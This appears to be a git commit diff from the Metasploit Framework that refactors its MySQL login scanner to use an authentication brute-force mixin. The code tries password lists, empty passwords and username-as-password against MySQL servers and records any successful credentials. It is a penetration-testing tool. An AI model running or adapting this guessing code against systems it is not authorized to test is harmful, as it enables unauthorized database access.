use the authbrute mixin
git-svn-id: file:///home/svn/framework3/trunk@8150 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d90ffdc015
commit
08eb80f4a9
|
@ -29,8 +29,8 @@ module Exploit::Remote::MYSQL
|
|||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(3306),
|
||||
OptString.new('MYSQL_USER', [ true, 'The username to authenticate as', 'root']),
|
||||
OptString.new('MYSQL_PASS', [ false, 'The password for the specified username', '']),
|
||||
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
|
||||
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
|
||||
], Msf::Exploit::Remote::MYSQL
|
||||
)
|
||||
end
|
||||
|
@ -55,7 +55,7 @@ module Exploit::Remote::MYSQL
|
|||
end
|
||||
|
||||
def mysql_login_datastore
|
||||
mysql_login(datastore['MYSQL_USER'], datastore['MYSQL_PASS'])
|
||||
mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
end
|
||||
|
||||
def mysql_query(sql)
|
||||
|
|
|
@ -16,9 +16,10 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MYSQL
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -31,56 +32,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('MYSQL_PASS_FILE', [ false, 'A dictionary of passwords to perform a bruteforce attempt']),
|
||||
OptBool.new('VERBOSE', [ true, 'Verbose output', false])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
user = datastore['MYSQL_USER'].to_s
|
||||
user = "root" if user.empty?
|
||||
|
||||
if (datastore['MYSQL_PASS_FILE'] and not datastore['MYSQL_PASS_FILE'].empty?)
|
||||
stime = Time.now.to_f
|
||||
cnt = 0
|
||||
|
||||
File.open(datastore['MYSQL_PASS_FILE'], "rb") do |fd|
|
||||
lcnt = 0
|
||||
fd.each_line{lcnt += 1 }
|
||||
fd.seek(0)
|
||||
|
||||
# Always try a blank password (not handled in the file parsing)
|
||||
ret = do_login(user, '', datastore['VERBOSE'])
|
||||
return if ret == :pass
|
||||
return if ret == :error
|
||||
|
||||
fd.each_line do |line|
|
||||
line.strip!
|
||||
next if line =~ /^#/
|
||||
next if line.empty?
|
||||
|
||||
ret = do_login(user, line.strip, datastore['VERBOSE'])
|
||||
break if ret == :pass
|
||||
break if ret == :error
|
||||
|
||||
cnt += 1
|
||||
if(cnt % 1000 == 0)
|
||||
pps = (cnt / (Time.now.to_f - stime)).to_i
|
||||
pct = (cnt/lcnt.to_f * 100.0).to_i
|
||||
eta = ((lcnt - cnt) / pps / 60.0).to_i
|
||||
print_status(
|
||||
"#{rhost}:#{rport} completed #{cnt}/#{lcnt} passwords (#{pct}%) " +
|
||||
"at a rate of #{pps} per second " +
|
||||
"ETA #{eta} minutes"
|
||||
)
|
||||
end
|
||||
end
|
||||
end
|
||||
else
|
||||
do_login(user, datastore['MYSQL_PASS'], datastore['VERBOSE'])
|
||||
end
|
||||
each_user_pass { |user, pass|
|
||||
do_login(user, pass, datastore['VERBOSE'])
|
||||
}
|
||||
end
|
||||
|
||||
|
||||
|
@ -92,24 +52,34 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("#{rhost}:#{rport} successful logged in as '#{user}' with password '#{pass}'")
|
||||
report_auth_info(
|
||||
:host => rhost,
|
||||
:proto => 'MYSQL',
|
||||
:proto => 'mysql',
|
||||
:user => user,
|
||||
:pass => pass,
|
||||
:targ_host => rhost,
|
||||
:targ_port => rport
|
||||
)
|
||||
return :pass
|
||||
return :next_user
|
||||
rescue ::RbMysql::AccessDeniedError
|
||||
print_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") if verbose
|
||||
return :fail
|
||||
print_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") if verbose
|
||||
return :fail
|
||||
rescue ::RbMysql::Error => e
|
||||
print_error("#{rhost}:#{rport} failed to login: #{e}")
|
||||
return :error
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::ConnectionError
|
||||
return :error
|
||||
return :done
|
||||
end
|
||||
end
|
||||
|
||||
def next_pass(state)
|
||||
# Always try empty and the username
|
||||
passes = ['', state[:user]]
|
||||
state[:idx] ||= 0
|
||||
pass = passes[state[:idx]]
|
||||
state[:idx] += 1
|
||||
return pass
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue